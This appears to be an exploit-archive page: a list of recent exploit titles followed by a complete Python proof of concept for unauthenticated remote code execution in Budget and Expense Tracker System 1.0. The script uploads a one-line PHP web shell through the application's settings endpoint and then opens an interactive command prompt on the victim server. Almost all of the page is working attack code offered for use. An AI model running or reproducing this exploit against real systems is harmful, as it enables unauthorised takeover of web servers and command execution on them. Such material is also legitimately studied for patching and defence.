
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
129 lines
No EOL
4.4 KiB
Text
129 lines
No EOL
4.4 KiB
Text
# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
|
|
# Exploit Author: Abdullah Khawaja (hax.3xploit)
|
|
# Date: 2021-09-21
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
|
|
# Version: 2.0
|
|
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
|
|
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
|
|
|
|
|
|
|
|
# RCE via executing exploit:
|
|
# Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
|
|
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
|
|
|
|
|
|
import requests, sys, urllib, re
|
|
import datetime
|
|
from colorama import Fore, Back, Style
|
|
|
|
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
|
|
|
|
|
|
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
|
|
|
|
print(Style.BRIGHT+" Budget and Expense Tracker System 1.0")
|
|
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
|
|
print(header)
|
|
|
|
print(r"""
|
|
______ _______ ________
|
|
___ //_/__ /_______ ___ _______ ______(_)_____ _
|
|
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
|
|
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
|
|
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
|
|
/___/
|
|
abdullahkhawaja.com
|
|
""")
|
|
|
|
|
|
|
|
GREEN = '\033[32m' # Green Text
|
|
RED = '\033[31m' # Red Text
|
|
RESET = '\033[m' # reset to the defaults
|
|
|
|
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
|
|
|
|
|
|
#Create a new session
|
|
s = requests.Session()
|
|
|
|
|
|
#Set Cookie
|
|
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
|
|
|
|
LINK=input("Enter URL of The Vulnarable Application : ")
|
|
|
|
|
|
def webshell(LINK, session):
|
|
try:
|
|
WEB_SHELL = LINK+'/uploads/'+filename
|
|
getdir = {'cmd': 'echo %CD%'}
|
|
r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
|
|
r2.raise_for_status()
|
|
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
|
|
cwd = re.findall('[CDEF].*', r2.text)
|
|
cwd = cwd[0]+"> "
|
|
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
|
|
while True:
|
|
thought = input(term)
|
|
command = {'cmd': thought}
|
|
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
r2.raise_for_status()
|
|
response2 = r2.text
|
|
print(response2)
|
|
except:
|
|
print("\r\nExiting.")
|
|
sys.exit(-1)
|
|
|
|
|
|
#Creating a PHP Web Shell
|
|
|
|
phpshell = {
|
|
'img':
|
|
(
|
|
'shell.php',
|
|
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
|
|
'application/octet-stream',
|
|
{'Content-Disposition': 'form-data'}
|
|
)
|
|
}
|
|
|
|
# Defining value for form data
|
|
data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
|
|
|
|
|
|
def id_generator():
|
|
x = datetime.datetime.now()
|
|
date_string = x.strftime("%y-%m-%d %H:%M")
|
|
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
|
|
timestamp = datetime.datetime.timestamp(date)
|
|
file = int(timestamp)
|
|
final_name = str(file)+'_shell.php'
|
|
return final_name
|
|
|
|
filename = id_generator()
|
|
#Uploading Reverse Shell
|
|
print("[*]Uploading PHP Shell For RCE...")
|
|
upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies)
|
|
|
|
shell_upload = True if("1" in upload.text) else False
|
|
u=shell_upload
|
|
if u:
|
|
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
|
|
else:
|
|
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
|
|
|
|
|
|
|
|
#Executing The Webshell
|
|
webshell(LINK, s) |